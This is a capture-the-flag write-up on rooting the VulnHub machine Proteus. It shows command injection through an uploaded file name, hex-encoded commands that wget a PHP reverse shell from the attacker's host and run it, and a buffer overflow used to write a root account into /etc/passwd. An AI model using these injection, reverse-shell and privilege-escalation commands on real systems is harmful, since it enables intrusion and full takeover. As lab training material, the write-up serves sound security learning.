Proteus is a relatively new machine that came on VulnHub. Created by Ivanvza, it surfaced on June 7th, 2017. It can be downloaded from https://www.vulnhub.com/entry/proteus-1,193/
The objective is to get root privileges and get the flag.
Downloaded and fired up, it presents with a login screen with no other information at all apart from telling us that it is a Corporate Malware Validator:
So, heading back to our attacking machine, Kali 2017.1, I run a simple command:
$ nmap 172.16.92.0/24
Now that we know the IP address of our target machine, let’s start by scanning it and see if we can get anything else:
For this case, I am using Zenmap, a GUI version of Nmap. The scan shows us that there are 2 ports open:
- Port 22 – Used for SSH
- Port 80 – Used to serve a web application
Let’s head to its port 80 and see what’s the web application we are dealing with:
On uploading a random file, I get the following message:
On uploading the right file type (application/x-executable, application/x-sharedlib formats supported) which was a sample C program I whipped up, I got the following on uploading it:
Looking at the output, it is clear that the system is running strings and objdump commands on the uploaded files. After doing some more research, I found out that ‘.‘ Moreover, ‘/‘ do not work.
This made me wonder whether I will be able to exploit it using RCE (Remote Code Execution). I thought to test it out with a basic Linux command.
To do that, I used Burp Suite and added the command id; after the file name that I was uploading:
and forwarded the request:
Ethical Hacking Training – Resources (InfoSec)
Now I know that RCE will work.
Now, time to add a shell.
I used a PHP-reverse-shell. However, we cannot upload the shell directly. I tried converting the commands into HEX and sent them the same way I sent the earlier commands.
I’ll be using the following format to send the request:
Echo HEX_CODE | xxd -r -p
And I’ll be converting the following commands into HEX:
wget http://172.16.92.141/shell.txt -O /tmp/shell.php
and their final code converts to be:
echo 7767657420687474703a2f2f3137322e31362e39322e3134312f7368656c6c2e747874202d4f202f746d702f7368656c6c2e706870 | xxd -r -p
echo 706870202F746D702F7368656C6C792E7068703B | xxd -r -p
I appended both commands the same way I appended the id command earlier and after running the second command, I got a reverse shell:
After digging for a little while, I came across a file called admin_login_logger and admin_login_request.js
Since I did not want to go back to the web application, I started to play around the first file.
After playing it with on my system, I realized that the file creates a new file at /var/log/proteus/log with the parameter we pass. For a long time, I played around with it, giving it various kinds of parameters, until, I entered a long parameter which crashed the file. To create that, I used a tool called pattern.py which can be found at https://raw.githubusercontent.com/Svenito/exploit-pattern/master/pattern.py
I ran the following command:
$ ./admin_login_logger ‘pattern.py 1024’
This made the file crash. After inspecting, I saw that a file was created in my current directory with the name first few characters of the string passed which made me wonder if I can figure out the extent of characters the file can take and use that to create a user on the target machine.
Upon running the following command:
$ pattern.py Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0A
I saw that it told me the first occurrence was at position 456. Time to exploit this:
To add a user, I need a password to enter in /etc/passwd
So, I added the following in /etc/passwd:
Time to run the exploit:
$ ./admin_login_logger ‘chiragh:$1$.T8Oa/jC$BSMBICcTHivnsn3RAXO6N/…:0:0::/tmp/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/etc/passwd’
$ su chiragh
And we are root!!
The flag is a PNG image which can be found at /root. I uploaded the image and served a PHP server.
The following links can help understand few ways we used to crack the target machine: